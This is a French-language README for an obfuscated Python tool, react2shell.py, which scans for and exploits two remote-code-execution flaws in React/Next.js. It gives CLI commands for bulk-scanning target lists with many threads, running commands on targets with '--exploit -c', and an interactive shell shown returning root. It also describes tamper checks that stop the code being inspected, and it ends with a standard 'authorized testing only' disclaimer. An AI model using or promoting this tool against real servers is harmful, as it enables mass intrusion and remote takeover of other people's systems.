
Scanne et exploite deux vulnérabilités RCE React/Next.js (CVE-2025-55182, CVE-2025-66478) avec exécution de commandes, shell interactif et prise en charge de cibles en masse.
Auteur : LAKSHMIKANTHAN K (letchupkt)
Instagram : @letchu_pkt
Version : 2.0.0 (obfusquée)
Date : 2025-12-07
python react2shell.py
C'est tout ! Le scanner va :
[1] Scan Single URL
[2] Scan Multiple URLs from File
[3] Exploit Single URL
[4] Exploit Multiple URLs from File
[5] Interactive Shell (Exploit Mode)
[6] Settings
[7] View Previous Results
[0] Exit
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Scan multiple URLs
python react2shell.py -f targets.txt
# Exploit with command
python react2shell.py -u https://target.com --exploit -c "whoami"
# Bulk scan with threads
python react2shell.py -f targets.txt -t 20 -o results.json
Chaque fois que vous exécutez le scanner, il :
Si quelqu'un tente de modifier le code obfusqué :
[ERROR] Scanner integrity check FAILED!
[!] The scanner code has been tampered with.
[!] This is a protected tool by LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Le scanner refusera de s'exécuter s'il détecte une quelconque altération.
Toutes les fonctionnalités d'origine sont 100 % préservées :
python react2shell.py -u https://example.com
Sortie :
=================================================================
CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Scanning: https://example.com
[+] VULNERABLE: https://example.com
Version: 15.0.1
CVE-2025-55182: VULNERABLE
CVE-2025-66478: VULNERABLE
python react2shell.py
# Select option 5
# Enter target URL
Session shell :
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
Cet outil est réservé aux TESTS DE SÉCURITÉ AUTORISÉS uniquement !
✅ Vos propres applications
✅ Tests d'intrusion autorisés
✅ Programmes de bug bounty (dans le périmètre)
✅ Recherche en sécurité (autorisée)
❌ Scan non autorisé
❌ Exploitation non autorisée
❌ Toute activité illégale
❌ Violation des conditions d'utilisation
L'auteur (LAKSHMIKANTHAN K) n'est pas responsable de l'utilisation abusive de cet outil. Les utilisateurs sont seuls responsables de leurs actions et doivent se conformer à toutes les lois applicables.
Cause : Le fichier est corrompu
Solution : Téléchargez une copie neuve
Cause : Le fichier a été modifié
Solution : Téléchargez une copie neuve (ne modifiez pas le fichier)
Cause : Dépendances manquantes
Solution :
pip install requests urllib3
Cause : Surcharge de décompression (minime)
Remarque : Cela ne se produit qu'une fois au démarrage, puis il fonctionne à pleine vitesse.
R : Le code est obfusqué et compressé. Vous pouvez utiliser la version originale non obfusquée si vous avez besoin de lire le code.
R : Impact minime. Il y a un léger délai au démarrage pour la décompression (~0,1 seconde), puis il fonctionne à pleine vitesse.
R : Non. Toute modification cassera la vérification d'intégrité et le scanner refusera de s'exécuter.
R : L'obfuscation n'est pas un chiffrement. Des attaquants déterminés peuvent toujours en faire de la rétro-ingénierie, mais c'est très difficile et prend du temps.
R : Contactez l'auteur sur Instagram : @letchu_pkt
Nom : LAKSHMIKANTHAN K (letchupkt)
Instagram : @letchu_pkt
Si vous rencontrez des problèmes :
pip install requests urllib3
python react2shell.py
Choisissez dans le menu interactif ou utilisez le mode CLI.
Suivez les instructions ou fournissez des arguments en ligne de commande.
# Interactive mode
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Bulk scan
python react2shell.py -f targets.txt -t 20
# Exploit
python react2shell.py -u https://target.com --exploit -c "whoami"
# Help
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
Instagram : @letchu_pkt
Merci d'utiliser le scanner CVE ! 🚀
Version : 2.0.0 (obfusquée)
Date : 2025-12-07
Licence : Réservé aux tests de sécurité autorisés uniquement